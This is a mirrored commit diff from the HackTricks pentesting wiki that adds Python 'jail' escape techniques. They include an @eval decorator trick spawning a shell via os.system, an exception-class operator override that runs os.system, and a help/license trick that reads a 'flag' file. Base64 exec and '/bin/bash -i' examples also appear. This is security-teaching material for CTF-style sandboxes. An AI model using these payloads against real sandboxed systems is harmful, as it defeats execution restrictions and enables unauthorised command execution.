mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
GitBook: [#3304] No subject
This commit is contained in:
parent
63b9773711
commit
a5d822e198
|
@ -134,7 +134,17 @@ exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
|
||||||
|
|
||||||
## Python execution without calls
|
## Python execution without calls
|
||||||
|
|
||||||
If you are inside a python jail that doesn't allow to make calls, there are still some ways to execute arbitrary functions:
|
If you are inside a python jail that **doesn't allow to make calls**, there are still some ways to **execute arbitrary functions, code** and **commands**.
|
||||||
|
|
||||||
|
### RCE with @eval
|
||||||
|
|
||||||
|
```python
|
||||||
|
@eval
|
||||||
|
@'__import__("os").system("sh")'.format
|
||||||
|
class _:pass
|
||||||
|
```
|
||||||
|
|
||||||
|
### RCE Declaring exceptions
|
||||||
|
|
||||||
```python
|
```python
|
||||||
# Declare arbitrary exception class
|
# Declare arbitrary exception class
|
||||||
|
@ -143,7 +153,7 @@ class Klecko(Exception):
|
||||||
return 1
|
return 1
|
||||||
|
|
||||||
# Change add function
|
# Change add function
|
||||||
Klecko.__add__ = os.system
|
Klecko.__add__ = os.system #os is already imported
|
||||||
|
|
||||||
# Generate an object of the class with a try/except + raise
|
# Generate an object of the class with a try/except + raise
|
||||||
## Trick from @_nag0mez
|
## Trick from @_nag0mez
|
||||||
|
@ -180,6 +190,17 @@ __ior__ (k |= "/bin/bash -i")
|
||||||
__ixor__ (k ^= "/bin/bash -i")
|
__ixor__ (k ^= "/bin/bash -i")
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Read file with builtins help
|
||||||
|
|
||||||
|
```python
|
||||||
|
__builtins__.__dict__["license"]._Printer__filenames=["flag"]
|
||||||
|
a = __builtins__.help
|
||||||
|
a.__class__.__enter__ = __builtins__.__dict__["license"]
|
||||||
|
a.__class__.__exit__ = lambda self, *args: None
|
||||||
|
with (a as b):
|
||||||
|
pass
|
||||||
|
```
|
||||||
|
|
||||||
## Builtins
|
## Builtins
|
||||||
|
|
||||||
* [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html)
|
* [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html)
|
||||||
|
|
Loading…
Reference in a new issue